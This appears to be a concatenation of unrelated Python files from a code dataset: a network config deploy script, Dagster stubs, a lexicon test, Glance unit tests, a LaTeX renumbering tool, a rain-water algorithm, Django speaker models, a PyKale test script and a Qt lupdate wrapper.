    task.host["config"] += rendered["result"]
def configure_interfaces(task):
    """Render per-host interface configuration.

    Loads extra_data/{host}/interfaces.yaml into task.host["interfaces"]
    and appends the rendered interfaces template to the config buffer.
    """
    loaded = data.load_yaml(task=task,
                            file="extra_data/{host}/interfaces.yaml")
    task.host["interfaces"] = loaded["result"]
    rendered = text.template_file(task=task,
                                  template="interfaces.j2",
                                  path="templates/interfaces/{nos}")
    task.host["config"] += rendered["result"]
def deploy_config(task):
    """Push the accumulated configuration to the device and print the diff."""
    result = networking.napalm_configure(task=task,
                                         replace=False,
                                         configuration=task.host["config"])
    # Blue header line per device, then the diff in yellow.
    header = "--- {} ({})".format(task.host, result.changed)
    click.secho(header, fg="blue", bold=True)
    click.secho(result.diff, fg='yellow')
    click.echo()
@click.command()
@click.option('--commit/--no-commit', default=False)
@click.option('--debug/--no-debug', default=False)
@click.argument('site')
@click.argument('role')
def deploy(commit, debug, site, role):
    """Render and deploy configuration to every device matching site/role."""
    # All output goes to a local "log" file; --debug raises verbosity.
    log_level = logging.DEBUG if debug else logging.INFO
    logging.basicConfig(
        filename="log",
        level=log_level,
        format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    )
    # Without --commit we stay in dry-run mode and only compute diffs.
    brigade = Brigade(
        inventory=SimpleInventory("hosts.yaml", "groups.yaml"),
        dry_run=not commit,
    )
    # Narrow the inventory to the requested site/role, then run each stage.
    selected = brigade.filter(site=site, role=role)
    for stage in (base_config, configure_interfaces, deploy_config):
        selected.run(task=stage)

if __name__ == "__main__":
    deploy()
|
from typing import Any
from unittest.mock import MagicMock
from pandas import DataFrame
from dagster import IOManager, io_manager
def create_db_connection() -> Any:
    """Return a stand-in database connection (a MagicMock in this example)."""
    connection = MagicMock()
    return connection
def train_recommender_model(df: DataFrame) -> Any:
    """Stub for model training; the input frame is discarded."""
    del df
    return None
def pickle_to_s3(object: Any, key: str) -> None:
    """Stub for uploading a pickled object to S3 under *key* (no-op here)."""
    # NOTE: the parameter name shadows the builtin `object`; it is kept
    # unchanged so keyword callers are not broken.
def fetch_products() -> DataFrame:
    """Return a tiny hard-coded product catalog as a DataFrame."""
    catalog = {"product": ["knive"], "category": ["kitchenware"]}
    return DataFrame(catalog)
@io_manager
def snowflake_io_manager():
    """Resource factory: an IOManager standing in for a Snowflake store."""

    class SnowflakeIOManager(IOManager):
        def handle_output(self, context, obj):
            """Pretend to persist *obj*; this example discards it."""
            del context, obj

        def load_input(self, context):
            """Hand back an empty frame in place of a real Snowflake read."""
            return DataFrame()

    return SnowflakeIOManager()
@io_manager
def s3_io_manager():
    """Resource factory: an IOManager standing in for an S3 bucket."""

    class S3IOManager(IOManager):
        def handle_output(self, context, obj):
            """Pretend to upload *obj*; this example discards it."""
            del context, obj

        def load_input(self, context):
            """Nothing to load in this example."""
            return None

    return S3IOManager()
|
import sys, os, re
import pprint
import filecmp
sys.path.append("../src")
import pronlex
import phonecodes
"""This script should be run from the command line, in the test directory.
It will load some pronlexes from the 'fixtures' subdirectory,
test phone code conversion, and test both word and phone searches."""
os.makedirs("outputs", exist_ok=True)
fixtures = [
["isle_eng_sample", ["arpabet", "disc", "xsampa"]],
["babel_amh_sample", ["xsampa"]],
["babel_ben_sample", ["xsampa"]],
["celex_deu_sample", ["disc", "xsampa"]],
["celex_eng_sample", ["arpabet", "disc", "xsampa"]],
["celex_nld_sample", ["disc", "xsampa"]],
["callhome_arz_sample", ["callhome", "xsampa"]],
["callhome_cmn_sample", ["callhome", "xsampa"]],
["callhome_spa_sample", ["callhome", "xsampa"]],
]
p = {}
original = sys.stdout
sys.stdout = open(os.path.join("outputs", "test_pronlex.txt"), "w")
#########################################################################
# Test reading in dictionaries, converting phonecodes, and writing them
for fixture in fixtures:
    srcfile = fixture[0]
    p[srcfile] = {}
    # The stem encodes dictionary type and language, e.g. "isle_eng_sample".
    (dtype, lang, rem) = srcfile.split("_")
    dict_params = {}
    if dtype == "isle":
        # ISLE entries include '#' and '.' symbols that are dropped on read
        # -- presumably boundary markers; confirm in the pronlex docs.
        dict_params["discard_phones"] = "#."
    print("Reading %s dict in %s from %s" % (dtype, lang, srcfile))
    # Load the lexicon and normalize to IPA as the pivot representation.
    p[srcfile]["ipa"] = pronlex.read(
        os.path.join("fixtures", srcfile) + ".txt", lang, dtype, dict_params
    ).recode("ipa")
    # Convert to each target code, and back again, and check results
    for c1 in fixture[1]:
        for c in [["ipa", c1], [c1, "ipa"]]:
            print("##########################################################")
            print("# Testing %s[%s].recode(%s)" % (srcfile, c[0], c[1]))
            p[srcfile][c[1]] = p[srcfile][c[0]].recode(c[1])
            destfile = re.sub(r"sample", c[1], srcfile)
            print("%s -> %s" % (srcfile, destfile))
            p[srcfile][c[1]].save(os.path.join("outputs", destfile) + ".txt")
            # Compare the saved output against the reference fixture,
            # line by line.
            with open(os.path.join("fixtures", destfile) + ".txt") as f:
                flines = f.readlines()
                # Trailing sentinel -- presumably a visual end marker for
                # the FAIL printout below.
                flines.append("-----\n")
            with open(os.path.join("outputs", destfile) + ".txt") as f:
                olines = f.readlines()
                olines.append("-----\n")
            if flines == olines:
                print("Pass")
            else:
                print("".join(["FAIL\n"] + flines + olines))
####################################################################
# Test looking up words
from sentences import sents

# sents maps language -> {code -> space-separated test sentence}; slists
# splits each sentence into a token list.
# NOTE(review): the comprehension variable `p` shadows the lexicon dict `p`
# but only inside the comprehension scope (Python 3), so this is safe.
slists = {
    L: {c: [p for p in S.split(" ")] for (c, S) in D.items()}
    for (L, D) in sents.items()
}
for fixture in fixtures:
    srcfile = fixture[0]
    (dtype, lang, rem) = srcfile.split("_")
    for c1 in ["ipa"] + fixture[1]:
        # Test words2phones
        print("##########################################################")
        print("# Testing words2phones(%s,%s)" % (srcfile, c1))
        res = p[srcfile][c1].words2phones(slists[lang]["word"])
        # NOTE(review): `pat` is compiled but never used in this branch --
        # presumably leftover from an earlier regex-based comparison.
        pat = re.compile(" ".join(slists[lang][c1]), re.IGNORECASE)
        if res == slists[lang][c1]:
            print("Pass")
        else:
            # On failure, print an element-by-element diff plus any
            # leftover tokens from whichever side is longer.
            print("FAIL")
            m = min(len(res), len(slists[lang][c1]))
            for n in range(0, m):
                if slists[lang][c1][n] == res[n]:
                    print("%s == %s" % (res[n], slists[lang][c1][n]))
                else:
                    print("%s != %s" % (res[n], slists[lang][c1][n]))
            if len(slists[lang][c1]) > m:
                print("Ref chars not in hyp:" + ":".join(slists[lang][c1][m:]))
            elif len(res) > m:
                print("Hyp chars not in ref:" + ":".join(res[m:]))
        # Test phones2words
        print("##########################################################")
        print("# Testing phones2words(%s,%s)" % (srcfile, c1))
        res = p[srcfile][c1].phones2words(slists[lang][c1])
        # Accept a pass if any candidate word sequence matches the
        # reference sentence (case-insensitively).
        pat = re.compile(" ".join(slists[lang]["word"]), re.IGNORECASE)
        if any(re.match(pat, " ".join(x)) for x in res[0]):
            print("Pass")
        else:
            print("FAIL")
            print("Target:" + ":".join(slists[lang]["word"]))
            print("Results:[" + "][".join([":".join(x) for x in res]) + "]")
# Test phones2words with 1 or 2 phone distance allowed
print("\n##########################################################")
print("# Testing phones2words(isle_eng_sample) with dist==2")
srcfile = "isle_eng_sample"
lang = "eng"
c1 = "ipa"
# With a nonzero distance argument, phones2words appears to return a dict
# keyed by string edit distance (see the iteration below) whose values are
# candidate word sequences -- confirm against the pronlex API.
res = p[srcfile][c1].phones2words(slists[lang][c1], 2)
for d in sorted(res.keys()):
    print("### Candidates with string edit distance == %d" % (d))
    for c in res[d]:
        print(" ".join(c))
|
# Copyright 2018 NTT DATA, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import os
import glance_store
from oslo_config import cfg
import glance.async.flows.plugins.inject_image_metadata as inject_metadata
from glance.common import utils
from glance import domain
from glance import gateway
from glance.tests.unit import utils as test_unit_utils
import glance.tests.utils as test_utils
CONF = cfg.CONF
UUID1 = 'c80a1a6c-bd1f-41c5-90ee-81afedb1d58d'
TENANT1 = '6838eb7b-6ded-434a-882c-b344c77fe8df'
class TestInjectImageMetadataTask(test_utils.BaseTestCase):
    """Tests for the inject_image_metadata import-flow plugin.

    The plugin must inject the configured properties for non-admin users,
    and must be a complete no-op (no image-repo access at all) for admin
    users or when the configured injection mapping is empty.
    """

    def setUp(self):
        super(TestInjectImageMetadataTask, self).setUp()
        # Minimal glance_store configuration backed by the test directory.
        glance_store.register_opts(CONF)
        self.config(default_store='file',
                    stores=['file', 'http'],
                    filesystem_store_datadir=self.test_dir,
                    group="glance_store")
        glance_store.create_stores(CONF)
        self.work_dir = os.path.join(self.test_dir, 'work_dir')
        utils.safe_mkdirs(self.work_dir)
        self.config(work_dir=self.work_dir, group='task')
        # Mocked collaborators; the plugin under test only touches img_repo.
        self.context = mock.MagicMock()
        self.img_repo = mock.MagicMock()
        self.task_repo = mock.MagicMock()
        self.image_id = mock.MagicMock()
        self.gateway = gateway.Gateway()
        self.task_factory = domain.TaskFactory()
        self.img_factory = self.gateway.get_image_factory(self.context)
        self.image = self.img_factory.new_image(image_id=UUID1,
                                                disk_format='qcow2',
                                                container_format='bare')
        task_input = {
            "import_from": "http://cloud.foo/image.qcow2",
            "import_from_format": "qcow2",
            "image_properties": {'disk_format': 'qcow2',
                                 'container_format': 'bare'}
        }
        task_ttl = CONF.task.task_time_to_live
        self.task_type = 'import'
        self.task = self.task_factory.new_task(self.task_type, TENANT1,
                                               task_time_to_live=task_ttl,
                                               task_input=task_input)

    def test_inject_image_metadata_using_non_admin_user(self):
        """Non-admin: configured properties are injected and the image saved."""
        context = test_unit_utils.get_fake_context(roles='member')
        inject_image_metadata = inject_metadata._InjectMetadataProperties(
            context, self.task.task_id, self.task_type, self.img_repo,
            self.image_id)
        self.config(inject={"test": "abc"},
                    group='inject_metadata_properties')
        with mock.patch.object(self.img_repo, 'get') as get_mock:
            image = mock.MagicMock(image_id=self.image_id,
                                   extra_properties={"test": "abc"})
            get_mock.return_value = image
            with mock.patch.object(self.img_repo, 'save') as save_mock:
                inject_image_metadata.execute()
                get_mock.assert_called_once_with(self.image_id)
                save_mock.assert_called_once_with(image)
                self.assertEqual({"test": "abc"}, image.extra_properties)

    def test_inject_image_metadata_using_admin_user(self):
        """Admin: injection is skipped, so the repo is never read or saved.

        Bug fix: the patches must be active BEFORE execute() runs.  The
        original patched afterwards, creating fresh mocks whose
        assert_not_called() passed vacuously regardless of behavior.
        """
        context = test_unit_utils.get_fake_context(roles='admin')
        inject_image_metadata = inject_metadata._InjectMetadataProperties(
            context, self.task.task_id, self.task_type, self.img_repo,
            self.image_id)
        self.config(inject={"test": "abc"},
                    group='inject_metadata_properties')
        with mock.patch.object(self.img_repo, 'get') as get_mock, \
                mock.patch.object(self.img_repo, 'save') as save_mock:
            inject_image_metadata.execute()
            get_mock.assert_not_called()
            save_mock.assert_not_called()

    def test_inject_image_metadata_empty(self):
        """Empty inject mapping: nothing to do, so the repo is untouched.

        Bug fix: as above, patch before calling execute() so the
        assert_not_called() checks are meaningful.
        """
        context = test_unit_utils.get_fake_context(roles='member')
        inject_image_metadata = inject_metadata._InjectMetadataProperties(
            context, self.task.task_id, self.task_type, self.img_repo,
            self.image_id)
        self.config(inject={}, group='inject_metadata_properties')
        with mock.patch.object(self.img_repo, 'get') as get_mock, \
                mock.patch.object(self.img_repo, 'save') as save_mock:
            inject_image_metadata.execute()
            get_mock.assert_not_called()
            save_mock.assert_not_called()
|
#!/usr/bin/env python3
# pytexnumber.py
#
# Renumbers LaTeX references
#
# Type python3 pytexnumber.py --help for help
# Copyright (c) 2013 - 2021 Vlad Gheorghiu. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import re
import sys
# builds the labels dictionary
def build_labels(input_file, pattern_in, ignore_comments):
    """Scan *input_file* for \\label{<pattern_in>...} commands.

    Returns [dictionary, warnings]: *dictionary* maps each unique
    '{<label>}' string to its 1-based order of first appearance, and
    *warnings* lists ['\\label{<label>}', line, column] entries for
    duplicate labels.  The file position is rewound before returning.
    """
    dictionary = {}   # '{<label>}' -> sequence number
    warnings = []     # duplicate-label reports
    for line_no, cur_line in enumerate(input_file, start=1):
        if ignore_comments is True:
            # Drop everything after the first '%' (LaTeX comment).
            cur_line = cur_line.split('%')[0]
        # Find every \label{<pattern_in>...} on this line.
        for labels in re.finditer(r'\\label{' + pattern_in + '.*?}', cur_line):
            # Keep only the '{...}' part of the command.
            label = re.search(r'{.*?}', labels.group()).group()
            if label in dictionary:
                # Seen before: record a duplicate warning (1-based column).
                warnings.append(['\\label' + label, line_no, labels.start() + 1])
            else:
                dictionary[label] = len(dictionary) + 1
    input_file.seek(0)  # rewind so the caller can re-read the file
    return [dictionary, warnings]
# replaces all matching references in the current line (up to comments if comments are ignored)
def replace_refs_in_line(keywords, pattern_in, pattern_out,
                         dictionary, line, line_idx, ignore_comments):
    """Replace all \\<keyword>{<pattern_in>...} references in one line.

    Args:
        keywords: reference commands to process, e.g. ['label', 'ref'].
        pattern_in: label prefix being renumbered.
        pattern_out: replacement prefix.
        dictionary: mapping '{<label>}' -> new number (from build_labels).
        line: the line of text to process.
        line_idx: 1-based line number, used in warnings.
        ignore_comments: when True, text after the first '%' is left as-is.

    Returns:
        [new_line, warnings] where warnings lists
        ['\\<keyword>{<label>}', line, column] for references missing from
        the dictionary.
    """
    warnings = []  # undefined reference(s) found in the current line
    line_no_comments = line
    comment = ""
    if ignore_comments is True:
        line_split = line.split('%', 1)
        line_no_comments = line_split[0]
        if len(line_split) > 1:  # we have a comment
            comment = '%' + line_split[1]
    for keyword in keywords:
        for matches in re.finditer('\\\\' + keyword +
                                   '{' + pattern_in + '.*?}', line_no_comments):
            # extract {pattern...} from \<keyword>{pattern...}
            match = re.search('{.*?}', matches.group()).group()
            if match not in dictionary:
                # undefined reference
                col_no = matches.start() + 1  # the warning's column number
                warnings.append(['\\' + keyword + match, line_idx, col_no])
            # Replace whenever {pattern...} differs from its renumbered form.
            if (match in dictionary and
                    ('{' + pattern_out + str(dictionary[match]) + '}') != match):
                replacement = (keyword + '_REPLACED_mark'
                               + '{' + pattern_out
                               + str(dictionary[match]) + '}')
                # Bug fix: escape the literal text being searched for --
                # labels containing regex metacharacters (e.g. '.', '+')
                # previously corrupted unrelated text.  The callable
                # replacement keeps backslashes in the new text literal.
                # The _REPLACED_mark sentinel stops a later match in this
                # loop from rewriting freshly substituted text.
                line_no_comments = re.sub(re.escape(keyword + match),
                                          lambda m, rep=replacement: rep,
                                          line_no_comments)
        line_no_comments = re.sub(keyword + '_REPLACED_mark', keyword,
                                  line_no_comments)
    return [line_no_comments + comment, warnings]
# main program
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description='Renumbers LaTeX equations.'
        'The program reads from the standard input and writes to the standard output.')
    # NOTE(review): both patterns are optional (nargs='?'); if omitted they
    # are None and the string concatenations in build_labels /
    # replace_refs_in_line raise TypeError -- confirm whether they should
    # be required arguments.
    parser.add_argument('pattern', nargs='?', help='input pattern, e.g., "eqn"')
    parser.add_argument('replacement', nargs='?', help='replacement pattern, e.g., "Eqn"')
    parser.add_argument('--ignore-comments', dest='comments', action='store_true',
                        help='ignore comments, true by default')
    parser.add_argument('--no-ignore-comments', dest='comments', action='store_false',
                        help='do not ignore comments, false by default')
    parser.set_defaults(comments=True)
    parser.add_argument('--log', help='log file')
    args = parser.parse_args()
    pattern = args.pattern  # pattern to replace
    replacement = args.replacement  # replacement
    ignore_comments = args.comments  # ignore LaTeX comments
    keywords = ['label', 'eqref', 'ref', 'pageref']  # modify as needed
    try:
        # process the stream
        # NOTE(review): build_labels() rewinds the input with seek(0); this
        # only works when stdin is redirected from a regular file -- piped
        # input would fail.  Also, the `with` closes sys.stdin/sys.stdout on
        # exit, so later prints to the "restored" stdout target a closed
        # stream -- verify intended usage.
        with sys.stdin as f_in, sys.stdout as f_out:
            # create the label dictionary
            [label_dictionary, label_warnings] = build_labels(f_in, pattern, ignore_comments)
            # replace all matching references line by line
            modified_lines = []  # list with the lines that are modified
            # NOTE(review): distinct_label_modifications is never updated --
            # presumably vestigial.
            distinct_label_modifications = 0  # count modified \label{pattern...}
            reference_warnings = []  # reference warnings
            for line_index, current_line in enumerate(f_in, start=1):
                [modified_line, warnings] = \
                    replace_refs_in_line(keywords, pattern, replacement, label_dictionary,
                                         current_line, line_index, ignore_comments)
                if modified_line != current_line:  # the line was modified
                    modified_lines += [line_index]
                if warnings:  # append reference warning(s) from the current line
                    reference_warnings += warnings
                f_out.write(modified_line)
        # display warnings
        # Warnings go to stderr so they do not mix with the rewritten document.
        original_stdout = sys.stdout
        sys.stdout = sys.stderr
        if label_warnings or reference_warnings:
            if reference_warnings:
                print('PARSING WARNING: Undefined references')
                for [item, row, col] in reference_warnings:
                    print(item + ', ' + str(row) + ':' + str(col))
            if label_warnings:
                print('PARSING WARNING: Duplicate labels')
                for [item, row, col] in label_warnings:
                    print(item + ', ' + str(row) + ':' + str(col))
        sys.stdout = original_stdout
        # write to log file (if any)
        if args.log is not None:
            try:
                with open(args.log, 'w') as logfile:
                    original_stdout = sys.stdout  # Save a reference to the original standard output
                    sys.stdout = logfile
                    # replacements
                    for item in sorted(label_dictionary, key=label_dictionary.get):
                        item_no_accolades = item
                        remove = ['{', '}']
                        for c in remove:
                            item_no_accolades = item_no_accolades.replace(c, '')
                        print(item_no_accolades + ' -> ' + replacement + str(label_dictionary[item]))
            except IOError as err:
                print(str(err))
    except IOError as err:
        print(str(err))
|
#!/usr/bin/env python
#coding: utf-8
class Solution:
    # @param A, a list of integers
    # @return an integer
    def trap(self, A):
        """Compute trapped rain water with a two-pointer level sweep.

        Raises the current water level to the smaller of the two edge
        bars, crediting area over the whole remaining span, and finally
        subtracts the volume occupied by the bars themselves.
        """
        lo, hi = 0, len(A) - 1
        water = bars = level = 0
        while lo <= hi:
            edge = A[lo] if A[lo] < A[hi] else A[hi]
            if edge > level:
                # Fill the remaining span up to the new water level.
                water += (edge - level) * (hi - lo + 1)
                level = edge
            # Consume the shorter edge; its bar volume is not water.
            if A[lo] < A[hi]:
                bars += A[lo]
                lo += 1
            else:
                bars += A[hi]
                hi -= 1
        return water - bars
if __name__ == '__main__':
    # Smoke test: the classic LeetCode example traps 6 units of water.
    s = Solution()
    assert 6 == s.trap([0,1,0,2,1,0,1,3,2,1,2,1])
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from imagekit.models import ImageSpecField
from imagekit.processors import ResizeToFill
from ..utils import slugify
from .locale import *
from .profiles import *
from .events import *
from .search import *
from .. import location
import pytz
import datetime
class Speaker(models.Model):
    """A user's speaker profile: photo, title, biography and interests."""

    user = models.ForeignKey(UserProfile, on_delete=models.CASCADE)
    # Optional speaker-specific photo; display falls back to the user's
    # avatar (see headshot/headshot_url).
    # NOTE(review): ProcessedImageField is not imported by name above -- it
    # presumably arrives via one of the star imports; confirm.
    avatar = ProcessedImageField(verbose_name=_("Photo Image"),
                                 upload_to='avatars',
                                 processors=[ResizeToFill(128, 128)],
                                 format='PNG',
                                 blank=True)
    # Short professional title shown next to the speaker's name in __str__.
    title = models.CharField(max_length=256, blank=True, null=True)
    bio = models.TextField(verbose_name=_('Biography'), blank=True)
    categories = models.ManyToManyField('Category', blank=True)
    topics = models.ManyToManyField('Topic', blank=True)

    def headshot(self):
        """Return the image to display: the speaker photo if set,
        otherwise the underlying user's avatar."""
        if self.avatar:
            return self.avatar
        else:
            return self.user.avatar

    def headshot_url(self):
        """Return the headshot URL, falling back to the user's avatar URL
        when no speaker photo was uploaded."""
        # NOTE(review): an ImageField attribute is a FieldFile and is not
        # normally None; the `is not None` checks are presumably always
        # true and the empty-name check does the real work -- confirm.
        if self.avatar is not None and self.avatar.name is not None and self.avatar.name != '':
            return self.avatar.url
        else:
            return self.user.avatar_url()

    def __str__(self):
        """'<user>, <title>' when a title is set, else just the user."""
        if self.title is not None and self.title != '':
            return '%s, %s' % (self.user, self.title)
        else:
            return str(self.user)
class Talk(models.Model):
    """A talk owned by a speaker; may be presented at multiple events."""

    # Values stored in talk_type.
    PRESENTATION = 0
    WORKSHOP = 1
    PANEL = 2
    ROUNDTABLE = 3
    QANDA = 4
    DEMO = 5
    TYPES = [
        (PRESENTATION, _("Presentation")),
        (WORKSHOP, _("Workshop")),
        (PANEL, _("Panel")),
        (ROUNDTABLE, _("Roundtable")),
        (QANDA, _("Q & A")),
        (DEMO, _("Demonstration")),
    ]

    speaker = models.ForeignKey(Speaker, verbose_name=_('Speaker Bio'), related_name='talks', on_delete=models.CASCADE)
    title = models.CharField(max_length=256)
    abstract = models.TextField()
    talk_type = models.SmallIntegerField(_("Type"), choices=TYPES, default=PRESENTATION)
    web_url = models.URLField(_("Website"), null=True, blank=True)
    category = models.ForeignKey('Category', on_delete=models.SET_NULL, blank=False, null=True)
    topics = models.ManyToManyField('Topic', blank=True)

    @property
    def future_presentations(self):
        """Presentations of this talk (proposed or accepted, status >= 0)
        at events that have not started yet."""
        return self.presentations.filter(status__gte=0, event__start_time__gt=timezone.now())

    @property
    def past_presentations(self):
        """Accepted presentations (status == 1) at events that have
        already started."""
        return self.presentations.filter(status=1, event__start_time__lte=timezone.now())

    def __str__(self):
        # Bug fix: the original computed self.title without returning it,
        # so __str__ returned None and str(talk) raised TypeError.
        return self.title
class SpeakerRequest(models.Model):
    """A call for speakers at an event, optionally narrowed by topics."""
    event = models.ForeignKey(Event, on_delete=models.CASCADE)
    topics = models.ManyToManyField('Topic', blank=True)
class Presentation(models.Model):
    """A (proposed) scheduling of a Talk at an Event."""

    # Values stored in status.
    DECLINED = -1
    PROPOSED = 0
    ACCEPTED = 1
    STATUSES = [
        (DECLINED, _("Declined")),
        (PROPOSED, _("Proposed")),
        (ACCEPTED, _("Accepted")),
    ]

    event = models.ForeignKey(Event, related_name='presentations', on_delete=models.CASCADE)
    talk = models.ForeignKey(Talk, related_name='presentations', on_delete=models.CASCADE, blank=False, null=True)
    status = models.SmallIntegerField(choices=STATUSES, default=PROPOSED, db_index=True)
    start_time = models.DateTimeField(verbose_name=_('Start Time'), db_index=True, null=True, blank=True)
    created_by = models.ForeignKey(UserProfile, on_delete=models.SET_NULL, null=True, blank=False)
    created_time = models.DateTimeField(default=timezone.now, db_index=True)

    def __str__(self):
        """'<talk title> at <event name>', or a placeholder if no talk."""
        try:
            return '%s at %s' % (self.talk.title, self.event.name)
        except AttributeError:
            # talk is nullable: self.talk may be None, and Django's
            # RelatedObjectDoesNotExist also subclasses AttributeError.
            # The original bare `except:` swallowed every error here,
            # including KeyboardInterrupt -- narrowed to the realistic case.
            return _("No talk")
|
"""This example is testing domain adaptation for action recognition, using PyTorch Lightning.
We can load and test different trained models without training.
"""
import argparse
import logging
import pytorch_lightning as pl
import torch
from config import get_cfg_defaults
from model import get_model
from kale.loaddata.video_access import VideoDataset
from kale.loaddata.video_multi_domain import VideoMultiDomainDatasets
def arg_parse():
    """Parse command-line arguments for the domain-adaptation example."""
    parser = argparse.ArgumentParser(description="Domain Adversarial Networks on Action Datasets")
    # (flag, add_argument keyword arguments)
    options = [
        ("--cfg", dict(required=True, help="path to config file", type=str)),
        ("--gpus", dict(default="0", help="gpu id(s) to use", type=str)),
        ("--resume", dict(default="", type=str)),
        ("--ckpt", dict(default="", help="pre-trained parameters for the model (ckpt files)", type=str)),
    ]
    for flag, kwargs in options:
        parser.add_argument(flag, **kwargs)
    return parser.parse_args()
def weights_update(model, checkpoint):
    """Load matching pre-trained parameters from *checkpoint* into *model*.

    Only checkpoint entries whose keys exist in the model's own state dict
    are applied; everything else is ignored.  Returns the same model.
    """
    current = model.state_dict()
    compatible = {
        name: tensor
        for name, tensor in checkpoint["state_dict"].items()
        if name in current
    }
    current.update(compatible)
    model.load_state_dict(current)
    return model
def main():
    """The main for this domain adaptation example, showing the workflow"""
    args = arg_parse()
    # ---- setup configs ----
    # Defaults are overridden by the YAML file given via --cfg, then frozen
    # so later code cannot mutate them.
    cfg = get_cfg_defaults()
    cfg.merge_from_file(args.cfg)
    cfg.freeze()
    print(cfg)
    # ---- setup output ----
    format_str = "@%(asctime)s %(name)s [%(levelname)s] - (%(message)s)"
    logging.basicConfig(format=format_str)
    # ---- setup dataset ----
    seed = cfg.SOLVER.SEED
    source, target, num_classes = VideoDataset.get_source_target(
        VideoDataset(cfg.DATASET.SOURCE.upper()), VideoDataset(cfg.DATASET.TARGET.upper()), seed, cfg
    )
    dataset = VideoMultiDomainDatasets(
        source,
        target,
        image_modality=cfg.DATASET.IMAGE_MODALITY,
        seed=seed,
        config_weight_type=cfg.DATASET.WEIGHT_TYPE,
        config_size_type=cfg.DATASET.SIZE_TYPE,
    )
    # ---- setup model and logger ----
    # NOTE(review): train_params is unused (test-only script), the --resume
    # flag is parsed but unused, and args.ckpt is consumed both by
    # resume_from_checkpoint and by the explicit weights_update() below --
    # presumably redundant; confirm.
    model, train_params = get_model(cfg, dataset, num_classes)
    trainer = pl.Trainer(
        # progress_bar_refresh_rate=cfg.OUTPUT.PB_FRESH, # in steps
        logger=False,
        resume_from_checkpoint=args.ckpt,
        gpus=args.gpus,
    )
    # Splice the checkpoint weights into the freshly built model, keeping
    # only parameters whose names match.
    model_test = weights_update(model=model, checkpoint=torch.load(args.ckpt))
    # test scores
    trainer.test(model=model_test)

if __name__ == "__main__":
    main()
|
import os
import sys
from common import (QtToolModuleNotFoundError, catch_known_errors,
is_installed, remove_vendor_suffix)
def run():
    """Dispatch to the first available Qt `lupdate` implementation.

    Tries PyQt6, then PySide2, then PyQt5, and raises
    QtToolModuleNotFoundError when none is installed.  Exits the process
    with the selected tool's return code.
    """
    sys.argv[0] = remove_vendor_suffix(sys.argv[0])
    # lupdate-pyside6 is deprecated and can have a bug:
    # https://bugreports.qt.io/browse/PYSIDE-1376?focusedCommentId=562463&page=com.atlassian.jira.plugin.system.issuetabpanels%3Acomment-tabpanel#comment-562463
    # if is_installed('PySide6'):
    #     from PySide6.scripts.pyside_tool import main
    if is_installed('PyQt6'):
        from PyQt6.lupdate.pylupdate import main
    elif is_installed('PySide2'):
        from PySide2.scripts.pyside_tool import main
        # Rewrite argv[0] to the pyside2-prefixed tool name -- presumably
        # pyside_tool.main() selects which tool to run from argv[0];
        # confirm against the PySide2 tooling docs.
        sys.argv[0] = os.path.join(
            os.path.dirname(sys.argv[0]),
            f'pyside2-{os.path.basename(sys.argv[0])}'
        )
    elif is_installed('PyQt5'):
        from PyQt5.pylupdate_main import main
    else:
        raise QtToolModuleNotFoundError('lupdate')
    sys.exit(main())

# Entry point: catch_known_errors converts known failures into friendly
# messages/exit codes.
if __name__ == '__main__':
    catch_known_errors(run)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.